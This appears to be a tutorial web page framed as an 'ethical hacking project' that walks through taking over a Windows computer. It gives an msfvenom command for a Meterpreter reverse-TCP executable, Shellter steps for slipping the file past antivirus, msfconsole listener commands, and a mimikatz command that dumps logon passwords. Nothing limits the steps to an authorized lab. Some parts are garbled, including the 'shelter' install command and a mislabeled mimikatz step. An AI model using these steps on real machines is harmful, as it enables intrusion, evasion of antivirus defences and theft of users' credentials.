How to Hack a Windows Computer with A Simple Payload

Published on . Written by

Hack a Windows Computer By Using a Simple Payload - Ethical hacking project

Can windows be hacked? The answer is yes. There are many methods by which windows can be hacked! One of them is the payload method. In this ethical hacking project, you will learn to hack windows using the payload method.


Skyfi Labs Projects
Requirement :

# Kali Linux

# Metasploit

# Shelter 

Read more..

SLNOTE
Let's Start :

We need Metasploit in kali Linux to create a payload. 

What is Metasploit?

It is a framework mostly used by hackers to set up the listener to manipulate the machines. We will use this framework in Kali Linux to create a payload for windows.

Creating a malicious executable Exe file:

To create a malicious file, we will use msf venom,

With these commands we create a malicious exe file:


SLLATEST
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/pj.exe

(you can use any name .exe)

This above command instructs the msf venom to generate an executable file that implements the reverse tcp connection for payload. 

Here LHOST is the IP address of our machine.

LPORT is a port to listen to the connection from the target.

(if you want to know your ip address just type ifconfig in the terminal)

Now the payload is ready but now we have to bypass the antivirus, we’ll encode it to make it undetectable.

Making it undetectable :

To encode our file we use the shelter, shelter changes the signature of the file to new and unique. But as we know the antivirus also scans the behavior of the payload file. it scans the file 7-10 times. So that is why we are using the shelter to whole encode the file. Also note that while encoding the payload file disables the automatic submission, otherwise it can be detected by the antivirus.

So to install shelter  in Kali Linux, run the commands :

Sudo apt-get install shelter

After running this command the shelter will initialize, so select ‘Y’ yes when it asks to !!

After the installation it will ask you, to enter the payload either in listed or custom. Choose the listed as ‘L’.

After that select the index position, choose Meterpreter_Reverse_TCP.

After that, it will ask you for the LHOST and LPORT, after entering these requirements hit enter.

Then it will run the completion.

Wait for some time, it will provide you an undetectable .exe payload file.

Msf console :

Now, we need to set up the listener on the port.

So type msfconsole in the Kali Linux terminal.

Now use these commands :

# use multi/handler

# set payload windows/meterpreter/reverse_tcp

# set LHOST (your ip)

# set LPORT 4444

# exploit 

After entering these commands in the terminal, TCP handler starts to wait for the connection.

Now execute the payload in the windows.

After executing the payload in the pc or windows system, then we will receive the meterpreter session on our Kali Linux terminal.

But it will show access denied in the terminal. So we will check the id by running the getuid command in the terminal, it will tell you the user id.

To show the user lacks privileges: run this command 

mimikatz_command -f sekurlsa::logonPasswords

So you will get access to the pc. Somehow if you are not able to gain access then you need to do UAC bypassing.


SLDYK
Kit required to develop How to Hack a Windows Computer with A Simple Payload :
Technologies you will learn by working on How to Hack a Windows Computer with A Simple Payload :


Any Questions?